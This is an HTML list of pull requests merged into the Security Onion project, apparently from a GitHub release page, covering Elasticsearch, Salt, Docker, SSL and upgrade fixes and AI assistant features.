<li>update kratos index template by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3782467724" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15353" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15353/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15353">#15353</a></li>
<li>exempt kratos online check by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3785405132" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15358" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15358/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15358">#15358</a></li>
<li>suppress config diffs to avoid false positive errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3785985702" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15359" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15359/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15359">#15359</a></li>
<li>Assistant: Session Report Template by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mc-wright/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mc-wright">@mc-wright</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3782741249" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15355" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15355/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15355">#15355</a></li>
<li>ES 9.0.8 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3789453605" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15363" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15363/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15363">#15363</a></li>
<li>Case Report Update for AI Session Attachments by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mc-wright/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mc-wright">@mc-wright</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3794092523" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15367" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15367/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15367">#15367</a></li>
<li>Add version 2.4.201 to discussion template by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3818892595" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15389" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15389/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15389">#15389</a></li>
<li>Fixmerge201210 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3818915095" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15390" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15390/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15390">#15390</a></li>
<li>2.4.201 into dev by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3818842834" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15387" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15387/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15387">#15387</a></li>
<li>follow symlinks for docker cp by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3819218514" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15391" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15391/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15391">#15391</a></li>
<li>add additional retries within scripts before salt re-runs the entire … by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3823266897" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15393" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15393/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15393">#15393</a></li>
<li>remove usage of deprecated 'logs' integration in favor of 'filestream' by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3823283151" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15394" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15394/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15394">#15394</a></li>
<li>Fstes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3824001482" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15397" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15397/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15397">#15397</a></li>
<li>break out ssl state by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3831366260" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15400" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15400/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15400">#15400</a></li>
<li>allow logstash.ssl for eval and import. fix soup create_ca_pillar by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3834590162" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15402" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15402/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15402">#15402</a></li>
<li>create dir if nonexistent by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3835134309" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15405" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15405/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15405">#15405</a></li>
<li>reinstall agent on grid nodes when service wasn't cleanly removed. eg… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3834951590" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15404" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15404/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15404">#15404</a></li>
<li>fix include by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3835534911" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15406" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15406/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15406">#15406</a></li>
<li>more better by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3835541007" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15407" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15407/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15407">#15407</a></li>
<li>fix kafka state by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3839576255" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15408" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15408/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15408">#15408</a></li>
<li>fix auto soup - check for compatible versions and fallback to a known… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3844961010" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15410" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15410/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15410">#15410</a></li>
<li>add retries to so-resources repo pull by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3845025869" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15411" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15411/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15411">#15411</a></li>
<li>missing  updates to variables by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3845056615" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15412" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15412/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15412">#15412</a></li>
<li>ignore kratos file mapping error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3849511115" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15414" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15414/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15414">#15414</a></li>
<li>exclude known error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3861987346" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15420" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15420/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15420">#15420</a></li>
<li>update redis log file path by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3862747465" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15424" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15424/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15424">#15424</a></li>
<li>update heavynode's elastic-agent standalone policy by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3857673307" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15418" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15418/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15418">#15418</a></li>
<li>include all so-grid-nodes_* policies in automatic EA upgrades by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3866435572" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15435" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15435/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15435">#15435</a></li>
<li>run fleet ssl state in fleet.config to ensure all required certs are … by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3867483894" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15436" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15436/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15436">#15436</a></li>
<li>ensure exclude_files excludes log rotation pattern by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3871713912" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15438" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15438/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15438">#15438</a></li>
<li>Change version from 2.4.201 to UNRELEASED by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3871907817" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15440" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15440/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15440">#15440</a></li>
<li>initialize specific indices as needed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3872718733" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15442" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15442/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15442">#15442</a></li>
<li>use logstash merged values for logstash metric collection by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3876711533" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15447" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15447/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15447">#15447</a></li>
<li>keep logsdb disabled by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3877553706" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15448" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15448/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15448">#15448</a></li>
<li>Cogburn/gemini by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coreyogburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coreyogburn">@coreyogburn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3872969020" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15443" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15443/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15443">#15443</a></li>
<li>allow network installs to use ISO for faster soupin by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3907905473" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15465" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15465/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15465">#15465</a></li>
<li>don't set is_airgap when using nonairgap_useiso: not a true airgap sy… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3908090639" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15468" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15468/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15468">#15468</a></li>
<li>default roles by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3916708276" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15472" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15472/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15472">#15472</a></li>
<li>Remove QWEN 235B model from defaults.yaml by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3917244683" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15473" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15473/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15473">#15473</a></li>
<li>clarify url_base description by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3934024154" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15482" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15482/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15482">#15482</a></li>
<li>Config Tweaks for AI by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coreyogburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coreyogburn">@coreyogburn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3933836092" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15481" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15481/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15481">#15481</a></li>
<li>Upgrade Salt 3006.19 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3953089476" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15491" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15491/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15491">#15491</a></li>
<li>fix sensor and heavynode first highstate failure by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3958145925" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15494" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15494/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15494">#15494</a></li>
<li>Revert "don't set is_airgap when using nonairgap_useiso: not a true airgap sy…" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3958481650" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15496" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15496/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15496">#15496</a></li>
<li>Revert "allow network installs to use ISO for faster soupin" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3958586726" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15497" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15497/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15497">#15497</a></li>
<li>Assistant: Investigated Query Toggle Filter by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mc-wright/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mc-wright">@mc-wright</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3954137674" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15492" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15492/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15492">#15492</a></li>
<li>upgrade docker by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3959835149" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15500" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15500/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15500">#15500</a></li>
<li>Add OpenAI Protocols by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coreyogburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coreyogburn">@coreyogburn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3959885610" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15501" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15501/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15501">#15501</a></li>
<li>rework autosoup for intermediate upgrades by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3959292299" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15499" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15499/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15499">#15499</a></li>
<li>upgrade docker by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3965389886" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15506" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15506/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15506">#15506</a></li>
